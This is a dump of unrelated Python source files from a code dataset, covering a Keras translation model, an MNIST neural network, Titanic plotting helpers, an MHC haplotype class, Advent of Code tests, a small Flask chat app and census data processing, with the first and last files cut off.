'/data/gpueval/imageProcessing/peguo0/cowFace/outputImages/cowList_files.txt'\n # eidFiles = getFileList(eidFilesPath)\n # for eidListFile in eidFiles: \n # df = eidListToDf(eidListFile)\n # plot_heatmap(df, eidListFile)\n \n \n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"plot_heatmap_cowNumber.py","file_name":"plot_heatmap_cowNumber.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"636510536","text":"from keras.models import model_from_json\nfrom keras.models import Model\nfrom keras.layers import Input, LSTM, Dense\nimport numpy as np\n\nbatch_size = 64 # Batch size for training.\nepochs = 2 # Number of epochs to train for.\nlatent_dim = 256 # Latent dimensionality of the encoding space.\nnum_samples = 1000 # Number of samples to train on.\n\ndata_path = 'data/hebASCII.txt' # Path to the data txt file on disk.\n\n\n# Turn the data to vectors\ninput_texts = []\ntarget_texts = []\ninput_characters = set()\ntarget_characters = set()\nlines = open(data_path).read().split('\\n')\nfor line in lines[: min(num_samples, len(lines) - 1)]:\n input_text, target_text = line.split('\\t')\n # I use \"tab\" as the \"start sequence\" character\n # for the targets, and \"\\n\" as \"end sequence\" character.\n target_text = '\\t' + target_text + '\\n'\n input_texts.append(input_text)\n target_texts.append(target_text)\n for char in input_text:\n input_characters.update(char)\n # if char not in input_characters:\n # input_characters.add(char)\n for char in target_text:\n target_characters.update(char)\n # if char not in target_characters:\n # target_characters.add(char)\n\ninput_characters = sorted(list(input_characters))\ntarget_characters = sorted(list(target_characters))\nnum_encoder_tokens = len(input_characters)\nnum_decoder_tokens = len(target_characters)\nmax_encoder_seq_length = max([len(txt) for txt in input_texts])\nmax_decoder_seq_length = max([len(txt) for txt in target_texts])\n\nprint('Number of samples:', len(input_texts))\nprint('Number of unique input tokens:', num_encoder_tokens)\nprint('Number of unique output tokens:', num_decoder_tokens)\nprint('Max sequence length for inputs:', max_encoder_seq_length)\nprint('Max sequence length for outputs:', max_decoder_seq_length)\n\ninput_token_index = dict([(char, i) for i, char in enumerate(input_characters)])\ntarget_token_index = dict([(char, i) for i, char in enumerate(target_characters)])\n\nencoder_input_data = np.zeros((len(input_texts), max_encoder_seq_length, num_encoder_tokens), dtype='float32')\ndecoder_input_data = np.zeros((len(input_texts), max_decoder_seq_length, num_decoder_tokens), dtype='float32')\ndecoder_target_data = np.zeros((len(input_texts), max_decoder_seq_length, num_decoder_tokens), dtype='float32')\n\n\nfor i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)):\n for t, char in enumerate(input_text):\n encoder_input_data[i, t, input_token_index[char]] = 1.\n for t, char in enumerate(target_text):\n # decoder_target_data is ahead of decoder_input_data by one time step\n decoder_input_data[i, t, target_token_index[char]] = 1.\n if t > 0:\n # decoder_target_data will be ahead by one time step and will not include the start character\n decoder_target_data[i, t - 1, target_token_index[char]] = 1.\n\n#---------------------------------------------------------------------------------------------------------------------#\n# Define an input sequence and process it\nencoder_inputs = Input(shape=(None, num_encoder_tokens))\nencoder = LSTM(latent_dim, return_state=True)\nencoder_outputs, state_h, state_c = encoder(encoder_inputs)\n# I discard `encoder_outputs` and only keep the states.\nencoder_states = [state_h, state_c]\n\n# Set up the decoder, using `encoder_states` as initial state.\ndecoder_inputs = Input(shape=(None, num_decoder_tokens))\n# I set up our decoder to return full output sequences, and to return internal states as well. I don't use the\n# return states in the training model, but I will use them in inference.\ndecoder_lstm = LSTM(latent_dim, return_sequences=True, return_state=True)\ndecoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state=encoder_states)\ndecoder_dense = Dense(num_decoder_tokens, activation='softmax')\ndecoder_outputs = decoder_dense(decoder_outputs)\n\n# Define the model that will turn\n# `encoder_input_data` & `decoder_input_data` into `decoder_target_data`\nmodel = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n\n# Run training\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy')\nmodel.fit([encoder_input_data, decoder_input_data], decoder_target_data,\n batch_size=batch_size, epochs=epochs, validation_split=0.2)\n# Save model\n# serialize model to JSON\nmodel_json = model.to_json()\njson_path = 'trained_models/heb-eng_model.json'\nh5_path = 'trained_models/heb-eng_model.h5'\nwith open(json_path, \"w\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nmodel.save_weights(h5_path)\nprint(\"Saved model to disk\")\n\n#---------------------------------------------------------------------------------------------------------------------#\n# Define sampling models\nencoder_model = Model(encoder_inputs, encoder_states)\ndecoder_state_input_h = Input(shape=(latent_dim,))\ndecoder_state_input_c = Input(shape=(latent_dim,))\ndecoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\ndecoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state=decoder_states_inputs)\ndecoder_states = [state_h, state_c]\ndecoder_outputs = decoder_dense(decoder_outputs)\ndecoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)\n\n# Reverse-lookup token index to decode sequences back to something readable.\nreverse_input_char_index = dict((i, char) for char, i in input_token_index.items())\nreverse_target_char_index = dict((i, char) for char, i in target_token_index.items())\n\ndef decode_sequence(input_seq):\n # Encode the input as state vectors.\n states_value = encoder_model.predict(input_seq)\n\n # Generate empty target sequence of length 1.\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n # Populate the first character of target sequence with the start character.\n target_seq[0, 0, target_token_index['\\t']] = 1.\n\n # Sampling loop for a batch of sequences(to simplify, here we assume a batch of size 1).\n stop_condition = False\n decoded_sentence = ''\n while not stop_condition:\n output_tokens, h, c = decoder_model.predict(\n [target_seq] + states_value)\n\n # Sample a token\n sampled_token_index = np.argmax(output_tokens[0, -1, :])\n sampled_char = reverse_target_char_index[sampled_token_index]\n decoded_sentence += sampled_char\n\n # Exit condition: either hit max length or find stop character.\n if (sampled_char == '\\n' or\n len(decoded_sentence) > max_decoder_seq_length):\n stop_condition = True\n\n # Update the target sequence (of length 1).\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n target_seq[0, 0, sampled_token_index] = 1.\n\n # Update states\n states_value = [h, c]\n\n return decoded_sentence\n\n#---------------------------------------------------------------------------------------------------------------------#\nfor seq_index in range(100):\n # Take one sequence (part of the training test) for trying out decoding.\n input_seq = encoder_input_data[seq_index: seq_index + 1]\n decoded_sentence = decode_sequence(input_seq)\n print('-')\n print('Input sentence:', input_texts[seq_index])\n print('Decoded sentence:', decoded_sentence)\n\n# load trained model - json and h5 weights model\nwith open(json_path, 'r') as f:\n loaded_model_json = f.read()\nloaded_model = model_from_json(loaded_model_json)\n# load weights into new model\nloaded_model.load_weights(h5_path)\nprint(\"Loaded model from disk\")\n\n# evaluate loaded model on test data\nloaded_model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\nscore = loaded_model.evaluate([encoder_input_data, decoder_input_data],decoder_target_data, verbose=0)\nprint(\"%s: %.2f%%\" % (loaded_model.metrics_names[1], score[1]*100))","sub_path":"Heb2Eng - Keras.py","file_name":"Heb2Eng - Keras.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"294671803","text":"# Стандартные библиотеки\nimport gzip\nimport pickle\nimport random\nimport json\n\n# Сторонние библиотеки\nimport numpy as np\n\n\nclass Network(object):\n\n\tdef __init__(self, sizes):\n\t\t\"\"\"Список sizes содержит количество слоев и нейронов в каждом слое. \n\t\tНапример - [784, 30, 10], нейросеть с одним скрытым слоем на 30 нейронов,\n\t\tвходным слоем на 784 нейрона и выходным слоем на 10 нейронов.\n\t\t\"\"\"\n\t\tself.num_layers = len(sizes)\n\t\tself.sizes = sizes\n\t\tself.lerning_rate = 0.1\n\t\tself.lmbda = 0.1\n\t\tself.weight_initialization()\n\t\tself.load_data()\n\n\tdef weight_initialization(self):\n\t\t\"\"\"Функция np.random.randn(), выдает числа согласно распределению Гаусса с математическим ожиданием 0,\n\t\tи стандартным отклонением 1. Для того что бы генерируемые числа больше стремились к 0, \n\t\tмы делим каждый сгенерированный вес на корень общего количества нейронов данного слоя.\n\t\tСтремление веса к нулю нам нужно потому что производная сигмоиды при 0 имеет максимальные значения,\n\t\tчто ускоряет процесс обучения.\n\t\tПочему бы сразу не взять нули? Потому что тогда, мы практически исключим из процесса обучения случайность,\n\t\tи рискуем застрять в локальном минимуме функции ошибки.\n\t\t\"\"\"\n\t\tself.biases = [np.random.randn(y, 1) for y in self.sizes[1:]]\n\t\tself.weights = [np.random.randn(y, x)/np.sqrt(x)\n\t\t\t\t\t\tfor x, y in zip(self.sizes[:-1], self.sizes[1:])]\n\n\tdef load_data(self):\n\t\t\"\"\"Загружаем 50 тыс. рукописных цифр с ответами, 10 тыс. валидационных и 10 тыс.\n\t\tтестовых изображений.\n\t\t\"\"\"\n\t\tf = gzip.open('mnist.pkl.gz', 'rb')\n\t\ttraining_data, validation_data, test_data = pickle.load(f, encoding=\"latin1\")\t\t\n\t\tf.close()\n\t\tself.training_data = self.preparing_data(training_data)\n\t\tself.validation_data = self.preparing_data(validation_data)\n\t\tself.test_data = self.preparing_data(test_data)\n\n\tdef preparing_data(self, data):\n\t\t\"\"\"Преобразовывем данные для удобства дальнейшей работы.\n\t\t\"\"\"\n\t\tinputs = [np.reshape(x, (784, 1)) for x in data[0]]\n\t\tresults = [self.vectorized_result(y) for y in data[1]]\n\t\tdata = zip(inputs, results)\n\t\treturn list(data)\n\n\tdef vectorized_result(self, j):\n\t\t\"\"\"Результат который у нас в виде цифры от 0 до 9, преобразовываем в десятимерный вектор, \n\t\tгде все нули, кроме порядкового номера рузльтата, он равен 1\n\t\t\"\"\"\n\t\te = np.zeros((10, 1))\n\t\te[j] = 1.0\n\t\treturn e\n\n\tdef learning(self, epochs, mini_batch_size, eta, lmbda):\n\t\tfor j in range(epochs):\n\t\t\trandom.shuffle(self.training_data)\n\t\t\tmini_batches = [\n\t\t\t\tself.training_data[k:k+mini_batch_size]\n\t\t\t\tfor k in range(0, len(self.training_data), mini_batch_size)]\n\t\t\tfor mini_batch in mini_batches:\n\t\t\t\tself.gradient_step(\n\t\t\t\t\tmini_batch, eta, lmbda, len(self.training_data))\n\n\t\t\tprint(\"Epoch %s training complete,\" % (j+1), \" accuracy on test data - \", self.evaluate(self.test_data), \"%\")\n\t\tprint(\"Accuracy on training data - \", self.evaluate(self.training_data), \"%\")\n\t\tprint(\"Accuracy on validation data - \", self.evaluate(self.validation_data), \"%\")\t\n\n\tdef gradient_step(self, mini_batch, eta, lmbda, n):\n\t\t\"\"\"\n\t\tОбновляем васа и смещение согласно данным посчитанным на одной мини корзине.\n\n\t\t\"\"\"\n\t\tnabla_b = [np.zeros(b.shape) for b in self.biases]\n\t\tnabla_w = [np.zeros(w.shape) for w in self.weights]\n\t\tfor x, y in mini_batch:\n\t\t\tdelta_nabla_b, delta_nabla_w = self.backprop(x, y)\n\t\t\tnabla_b = [nb+dnb for nb, dnb in zip(nabla_b, delta_nabla_b)]\n\t\t\tnabla_w = [nw+dnw for nw, dnw in zip(nabla_w, delta_nabla_w)]\n\t\t\"\"\"\n\t\tВыражение (1-eta*(lmbda/n)) это регуляризация, которая уменьшает значение веса.\n\t\tФункция ошибки кросс энтропии привод к излишнему обучению сети. Веса становятся\n\t\tбольшими и мы получает более высокое значение ошибки на валидационных данных.\n\t\tЭто выражение близко к 0,9 - что постоянно немоного уменьшает значение веса и защищает\n\t\tот переобученности сети.\n\n\t\t\"\"\"\n\t\tself.weights = [(1-eta*(lmbda/n))*w-(eta/len(mini_batch))*nw\n\t\t\t\t\t\tfor w, nw in zip(self.weights, nabla_w)]\n\t\tself.biases = [b-(eta/len(mini_batch))*nb\n\t\t\t\t\t for b, nb in zip(self.biases, nabla_b)]\n\n\tdef backprop(self, x, y):\n\t\t\"\"\" Использую обратное распространение ошибки считаем градиент для последующего изменения весов и\n\t\tсмещения.\n\t\tВ основе лежат 4 главных уравнения:\n\t\tδ^L = ∇aC ⦿ σ'(z^L)\n\t\tδ^l = (w^(l+1)T * δ^(l+1)) ⦿ σ'(z^L)\n\t\tdC/db = δ^l\n\t\tdC/dw = a^(l-1) * δ^l\n\t\tВ нашем случем вместо уравнения производной квадратичной ошибки мы используем\n\t\tфункцию ошибки кросс энтропии.\n\t\t\"\"\"\n\t\tnabla_b = [np.zeros(b.shape) for b in self.biases]\n\t\tnabla_w = [np.zeros(w.shape) for w in self.weights]\n\t\tactivation = x\n\t\tactivations = [x] \n\t\tzs = []\n\t\tfor b, w in zip(self.biases, self.weights):\n\t\t\tz = np.dot(w, activation)+b\n\t\t\tzs.append(z)\n\t\t\tactivation = self.sigmoid(z)\n\t\t\tactivations.append(activation)\n\t\t# Обратное распространени\n\t\tdelta = self.cross_entropy_cost(activations[-1], y)\n\t\tnabla_b[-1] = delta\n\t\tnabla_w[-1] = np.dot(delta, activations[-2].transpose())\n\n\t\tfor l in range(2, self.num_layers):\n\t\t\tz = zs[-l]\n\t\t\tsp = self.sigmoid_prime(z)\n\t\t\tdelta = np.dot(self.weights[-l+1].transpose(), delta) * sp\n\t\t\tnabla_b[-l] = delta\n\t\t\tnabla_w[-l] = np.dot(delta, activations[-l-1].transpose())\n\t\treturn (nabla_b, nabla_w)\t\t\n\n\tdef feedforward(self, a):\n\t\t\"\"\"Пропускаем одну картинку через нейросеть и получаем десятимерный вектор с результатом. \n\t\tПорядковый номер максимального значения в векторе является ответом нейросети какая изображена цифра.\n\t\t\"\"\"\n\t\tfor b, w in zip(self.biases, self.weights):\n\t\t\ta = self.sigmoid(np.dot(w, a)+b)\n\t\treturn a\n\n\tdef cross_entropy_cost(self, a, y):\n\t\t\"\"\"Вычисление производной функции ошибки (перекрестной энтропии).\n\t\tЭто формула самой функции ошибки перекрестной энтропии: \n\t\tnp.sum(np.nan_to_num(-y*np.log(a)-(1-y)*np.log(1-a)))\n\t\tВ отличии от самой функции ошибки, которая показает обсолютное значение,\n\t\tпроизводная показывает скорость изменения функции в данной точке. \n\t\t\"\"\"\n\t\treturn (a-y)\t\n\n\tdef sigmoid(self, z):\n\t\t\"\"\"Считаем сигмоиду по каждому нейрону. Сигмоида получает на вход значения от минус бесконечности,\n\t\tдо плюс бесконечности. На выходе сигмоида выдает значения от 0 до 1. Основное изменение функции идет\n\t\tна участке х от -6 до 6, еще больше от -4 до 4. При \"х\" равном 0, сигмоида равна 0,5. В этой же точке,\n\t\tмы имеем самое больше значение производной 0.25.\n\t\t\"\"\"\n\t\treturn 1.0/(1.0+np.exp(-z))\n\n\tdef sigmoid_prime(self, z):\n\t\t\"\"\"Считаем производную от сигмоиды. Производная нам показывает скорость изменения функции. \n\t\tМаксимальное значение 0.25 мы получим при входящем нуле.\n\t\t\"\"\"\n\t\treturn self.sigmoid(z)*(1-self.sigmoid(z))\t\n\n\tdef evaluate(self, data):\n\t\t\"\"\"Возвращает процент правильных ответов.\"\"\"\n\t\ttest_results = [(np.argmax(self.feedforward(x)), np.argmax(y))\n\t\t\t\t\t\tfor (x, y) in data]\n\t\taccuracy = sum(int(x == y) for (x, y) in test_results)\n\t\treturn float(accuracy/len(data)*100)\n\n\n\tdef save(self, filename):\n\t\t\"\"\"Сохраняем результаты обучения.\"\"\"\n\t\tdata = {\"sizes\": self.sizes,\n\t\t\t\t\"weights\": [w.tolist() for w in self.weights],\n\t\t\t\t\"biases\": [b.tolist() for b in self.biases],}\n\t\tf = open(filename, \"w\")\n\t\tjson.dump(data, f)\n\t\tf.close()\n\n\n#### Загружаем сохраненную нейросеть\ndef load(filename):\n\t\"\"\"Возвращает экземпляр класса.\n\t\"\"\"\n\tf = open(filename, \"r\")\n\tdata = json.load(f)\n\tf.close()\n\tnet = Network(data[\"sizes\"])\n\tnet.weights = [np.array(w) for w in data[\"weights\"]]\n\tnet.biases = [np.array(b) for b in data[\"biases\"]]\n\treturn net\n\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"618752424","text":"# Importations and Initializations\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndef display_survivability():\r\n figure = plt.figure(figsize=(18, 7))\r\n grids = figure.add_gridspec(1, 2)\r\n grids.update(wspace=0.3, hspace=0.15)\r\n ax0 = figure.add_subplot(grids[0, 0])\r\n ax1 = figure.add_subplot(grids[0, 1])\r\n\r\n TITLE_AX0 = \"[ TARGET VALUE ]\\n___________\\n\\nSURVIVED RATE\"\r\n ax0.text(0.5, 0.5, \r\n TITLE_AX0,\r\n horizontalalignment=\"center\",\r\n verticalalignment=\"center\",\r\n fontsize=28,\r\n fontweight=\"bold\",\r\n fontfamily=\"serif\",\r\n color=\"#000000\")\r\n\r\n ax0.set_xticklabels([]); ax0.set_yticklabels([])\r\n ax0.tick_params(left=False, bottom=False)\r\n\r\n ax_survived = ax1\r\n sns.countplot(x=\"Survived\",\r\n color=\"gray\",\r\n data=df_utility,\r\n ax=ax_survived,\r\n palette=\"gist_gray\")\r\n sns.despine()\r\n\r\n ax0.spines[\"top\"].set_visible(False)\r\n ax0.spines[\"left\"].set_visible(False)\r\n ax0.spines[\"bottom\"].set_visible(False)\r\n ax0.spines[\"right\"].set_visible(False)\r\n\r\n plt.show();\r\n\r\ndef display_categorical_distributions(title=\"Categorical Features\", track_survivability=False):\r\n figure = plt.figure(figsize=(18, 15))\r\n grids = figure.add_gridspec(3, 3)\r\n palette = \"gist_gray\"\r\n\r\n ax0 = figure.add_subplot(grids[0, 0])\r\n ax1 = figure.add_subplot(grids[0, 1])\r\n ax2 = figure.add_subplot(grids[0, 2])\r\n ax3 = figure.add_subplot(grids[1, 0])\r\n ax4 = figure.add_subplot(grids[1, 1])\r\n\r\n if track_survivability is True:\r\n hue = \"Survived\"\r\n else:\r\n hue = None\r\n\r\n ax_sex = ax0\r\n sns.countplot(x=\"Sex\", hue=hue, data=df_utility, ax=ax_sex, palette=palette)\r\n sns.despine()\r\n\r\n ax_parch = ax1\r\n sns.countplot(x=\"Parch\", hue=hue, data=df_utility, ax=ax_parch, palette=palette)\r\n sns.despine()\r\n\r\n ax_embarked = ax2\r\n sns.countplot(x=\"Embarked\", hue=hue, data=df_utility, ax=ax_embarked, palette=palette)\r\n sns.despine()\r\n\r\n ax_pclass = ax3\r\n sns.countplot(x=\"Pclass\", hue=hue, data=df_utility, ax=ax_pclass, palette=palette)\r\n sns.despine()\r\n\r\n ax_sibsip = ax4\r\n sns.countplot(x=\"SibSp\", hue=hue, data=df_utility, ax=ax_sibsip, palette=palette)\r\n sns.despine()\r\n\r\n figure.suptitle(title, fontweight=\"bold\", fontsize=20)\r\n figure.text(s=\"Sex, Parch, Embarked, Pclass, SibSip\", \r\n x=0.5, y=0.94, ha=\"center\",va=\"top\")\r\n\r\n plt.show();\r\n\r\ndef display_continuous_distributions(with_survivability=False):\r\n if with_survivability is True:\r\n figure = plt.figure(figsize=(18, 15))\r\n grids = figure.add_gridspec(3, 3)\r\n palette = \"gist_gray_r\"\r\n\r\n ax0 = figure.add_subplot(grids[0, 0])\r\n ax1 = figure.add_subplot(grids[0, 1])\r\n\r\n ax_sex = ax0\r\n sns.kdeplot(x=\"Age\", hue=\"Survived\", data=df_utility, fill=True, alpha=0.5, \r\n shade=True, ax=ax_sex, palette=palette)\r\n sns.despine()\r\n\r\n ax_parch = ax1\r\n sns.kdeplot(x=\"Fare\", hue=\"Survived\", data=df_utility, fill=True, alpha=0.5, \r\n shade=True, ax=ax_parch, palette=palette)\r\n sns.despine()\r\n\r\n figure.suptitle(\"Continous Features with Survivability\", fontweight=\"bold\", fontsize=20)\r\n figure.text(s=\"Age, Fare\", x=0.5, y=0.94, ha=\"center\", va=\"top\", fontsize=15)\r\n else:\r\n figure = plt.figure(figsize=(15, 8))\r\n grids = figure.add_gridspec(2, 3)\r\n palette = \"gist_gray\"; palette_r = \"gist_gray_r\"\r\n\r\n ax0 = figure.add_subplot(grids[0, 0])\r\n ax1 = figure.add_subplot(grids[0, 1])\r\n ax2 = figure.add_subplot(grids[1, 0])\r\n ax3 = figure.add_subplot(grids[1, 1])\r\n\r\n ax_sex = ax0\r\n sns.kdeplot(x=\"Age\", color=\"gray\", shade=True, alpha=0.5, data=df_utility, ax=ax_sex, palette=palette)\r\n sns.despine()\r\n\r\n ax_sex2 = ax2\r\n sns.boxenplot(x=\"Age\", hue=\"Survived\", data=df_utility, ax=ax_sex2, palette=palette_r)\r\n sns.despine()\r\n\r\n ax_sex = ax1\r\n sns.kdeplot(x=\"Fare\", color=\"gray\", shade=True, alpha=0.5, data=df_utility, ax=ax_sex, palette=palette)\r\n sns.despine()\r\n\r\n ax_fare2 = ax3\r\n sns.boxenplot(x=\"Fare\", hue=\"Survived\", data=df_utility, ax=ax_fare2, palette=palette_r)\r\n sns.despine()\r\n\r\n title_spaced = \" Age Fare\"\r\n figure.text(0.1, 1, title_spaced, fontsize=20, fontweight=\"bold\", fontfamily=\"serif\", ha=\"left\") \r\n\r\n plt.show();\r\n\r\n","sub_path":".ipynb_checkpoints/structures-checkpoint.py","file_name":"structures-checkpoint.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"443568459","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Sequence, Union\n\nfrom .allele import Allele\nfrom .mhc_class_helpers import (\n is_valid_restriction,\n restrict_alleles,\n)\nfrom .class2_locus import Class2Locus\nfrom .pair import Pair\nfrom .result_with_multiple_alleles import ResultWithMultipleAlleles\nfrom .species import Species\n\nclass Haplotype(ResultWithMultipleAlleles):\n def __init__(\n self,\n species: Species,\n name: str,\n alleles: Sequence[Allele],\n class_restriction: Union[str, None] = None,\n locus_restriction: Union[Class2Locus, None] = None,\n parent_haplotypes: Union[Sequence[\"Haplotype\"], None] = None,\n raw_string: Union[str, None] = None):\n ResultWithMultipleAlleles.__init__(\n self,\n species=species,\n name=name,\n alleles=alleles,\n raw_string=raw_string)\n self.class_restriction = class_restriction\n self.locus_restriction = locus_restriction\n self.parent_haplotypes = parent_haplotypes\n\n @classmethod\n def str_field_names(cls):\n return (\n \"species\",\n \"name\",\n \"num_alleles\",\n \"class_restriction\",\n \"locus_restriction\"\n )\n\n @classmethod\n def repr_field_names(cls):\n return (\n \"species\",\n \"name\",\n \"alleles\",\n \"class_restriction\",\n \"locus_restriction\"\n )\n\n @classmethod\n def eq_field_names(cls):\n return (\n \"species\",\n \"name\",\n \"class_restriction\",\n \"locus_restriction\"\n )\n\n @property\n def haplotype_name(self):\n return self.name\n\n def restrict_mhc_class(self, class_restriction, raise_on_error=True):\n if class_restriction is None:\n return self\n if self.class_restriction == class_restriction:\n return self\n if not is_valid_restriction(self.class_restriction, class_restriction):\n if raise_on_error:\n raise ValueError(\n \"Cannot restrict '%s' to class '%s'\" % (\n self.to_string(),\n class_restriction))\n else:\n return None\n restricted_alleles = restrict_alleles(self.alleles, class_restriction)\n return Haplotype(\n species=self.species,\n name=self.name,\n alleles=restricted_alleles,\n class_restriction=class_restriction,\n locus_restriction=self.locus_restriction,\n raw_string=self.raw_string)\n\n def restrict_class2_locus(self, class2_locus : Class2Locus, raise_on_error=True):\n if class2_locus is None:\n return self\n if self.locus_restriction == class2_locus:\n return self\n if self.locus_restriction is not None:\n if raise_on_error:\n raise ValueError(\n \"Haplotype %s already has locus restriction, cannot restrict to %s\" % (\n self, class2_locus))\n else:\n return None\n valid_genes = set(class2_locus.genes)\n\n restricted_alleles = [\n allele\n for allele in self.alleles\n if allele.gene in valid_genes\n ]\n return Haplotype(\n species=self.species,\n name=self.name,\n alleles=restricted_alleles,\n class_restriction=self.class_restriction,\n locus_restriction=class2_locus,\n raw_string=self.raw_string)\n\n def collapse_if_possible(self):\n \"\"\"\n If this haplotype contains a single allele or a single pair of\n class alleles for the same locus, return it. Otherwise return None.\n \"\"\"\n allele = self.get_single_allele()\n if allele:\n return allele\n\n class2_pair = self.get_class2_pair()\n if class2_pair:\n return class2_pair\n return None\n\n def get_single_allele(self):\n if len(self.alleles) == 1:\n return self.alleles[0]\n return None\n\n def get_class2_pair(self):\n if self.locus_restriction is None:\n return None\n alpha_genes = self.locus_restriction.alpha_chain_genes\n beta_genes = self.locus_restriction.beta_chain_genes\n\n if len(alpha_genes) == 0 or len(beta_genes) == 0:\n return None\n alpha_alleles = [\n a for a in self.alleles\n if a.gene in alpha_genes\n ]\n beta_alleles = [\n a for a in self.alleles\n if a.gene in beta_genes\n ]\n if len(alpha_alleles) != 1 or len(beta_alleles) != 1:\n return None\n\n alpha = alpha_alleles[0]\n beta = beta_alleles[0]\n return Pair(alpha, beta)\n\n def to_string(\n self,\n include_species=True,\n use_old_species_prefix=False):\n if self.locus_restriction:\n result = self.locus_restriction.to_string(\n include_species=include_species,\n use_old_species_prefix=use_old_species_prefix)\n else:\n result = self.species.to_string(\n include_species=include_species,\n use_old_species_prefix=use_old_species_prefix)\n\n result += (\"-%s\" % (self.name,))\n\n if self.class_restriction:\n result += \" class %s\" % (self.class_restriction,)\n\n return result\n\n def compact_string(self, include_species=False):\n return self.to_string(include_species=include_species)\n","sub_path":"mhcgnomes/haplotype.py","file_name":"haplotype.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"177709409","text":"import itertools\nfrom typing import List\n\n\ndef get_input() -> List[int]:\n with open(\"inputs/day9input.txt\", \"r\") as file:\n return [int(line.strip()) for line in file.readlines()]\n\n\ndef test_day9_part1():\n lines = get_input()\n\n def is_not_valid(index: int) -> bool:\n current = lines[index]\n return not any((i for i in range(index - 25, index) if current - lines[i] in itertools.islice(lines, i, index)))\n\n bad_index = next(index for index in range(25, len(lines)) if is_not_valid(index))\n\n print(f\"found invalid on line {bad_index}: {lines[bad_index]}\")\n\n assert bad_index == 564\n assert lines[bad_index] == 105950735\n\n\ndef test_day9_part2():\n lines = get_input()\n target = 105950735\n start_index = 0\n end_index = 0\n while start_index < len(lines) - 1:\n acc = lines[start_index]\n end_index = start_index + 1\n while end_index < len(lines) and acc < target:\n acc += lines[end_index]\n end_index += 1\n if acc == target:\n break\n start_index += 1\n window = lines[start_index:end_index]\n end_sum = min(window) + max(window)\n print(window)\n assert sum(window) == target\n assert start_index == 448\n assert end_index == 465\n assert end_sum == 13826915\n","sub_path":"solutions/test_day9.py","file_name":"test_day9.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"7287177","text":"from flask import Flask, render_template, request, flash, redirect, url_for\r\nfrom flask_sqlalchemy import SQLAlchemy\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'endxskuifxndiinmenxmeibdgedidg'\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///data.db'\r\ndb = SQLAlchemy(app)\r\n\r\nclass Chat(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n content = db.Column(db.String(1000))\r\n sender = db.Column(db.String(50))\r\n room = db.Column(db.Integer, db.ForeignKey('room.id'))\r\n\r\n def __repr__(self):\r\n return \"\" % self.id\r\n\r\nclass Room(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n roomname = db.Column(db.String(50), unique=True)\r\n password = db.Column(db.String(20))\r\n messages = db.relationship('Chat')\r\n\r\n def __repr__(self):\r\n return \"\" % self.id\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if request.method == 'POST':\r\n data = request.form['Room']\r\n\r\n if data:\r\n flash(\"Room Found!\")\r\n else:\r\n return redirect(url_for('add'))\r\n \r\n return render_template('index.html')\r\n\r\n@app.route('/rooms/add', methods=['GET', 'POST'])\r\ndef add():\r\n if request.method == 'POST':\r\n data = request.form['Room']\r\n \r\n return render_template('add.html')","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"225931132","text":"import pandas as pd\nimport numpy as np\nimport global_vars\n\ndef calc_census_marginal_totals(region_sel):\n\n age_df = pd.read_csv(global_vars.PROJ_PATH + \"/data/housing/LSOA_age_HRP_2011_interpolated.csv\").set_index('LSOACODE')\n region_age_df = age_df.loc[region_sel]\n\n hhsize_df = pd.read_csv(global_vars.PROJ_PATH + \"/data/housing/LSOA_hhsize_2011.csv\").set_index('LSOACODE')\n region_hhsize_df = hhsize_df.loc[region_sel]\n\n sex_df = pd.read_csv(global_vars.PROJ_PATH + \"/data/housing/LSOA_sex2_2011.csv\").set_index('LSOACODE')\n region_sex_df = sex_df.loc[region_sel]\n\n hhtype_df = pd.read_csv(global_vars.PROJ_PATH + \"/data/housing/LSOA_hhtype_2011.csv\").set_index('LSOACODE')\n region_hhtype_df = hhtype_df.loc[region_sel]\n\n dwtype_df = pd.read_csv(global_vars.PROJ_PATH + \"/data/housing/LSOA_dwtype_2011.csv\").set_index('LSOACODE')\n region_dwtype_df = dwtype_df.loc[region_sel]\n\n scale_factor = (region_dwtype_df.sum() / region_sex_df.sum())\n\n region_sex_df = (region_sex_df*scale_factor)\n\n sex_new_df = 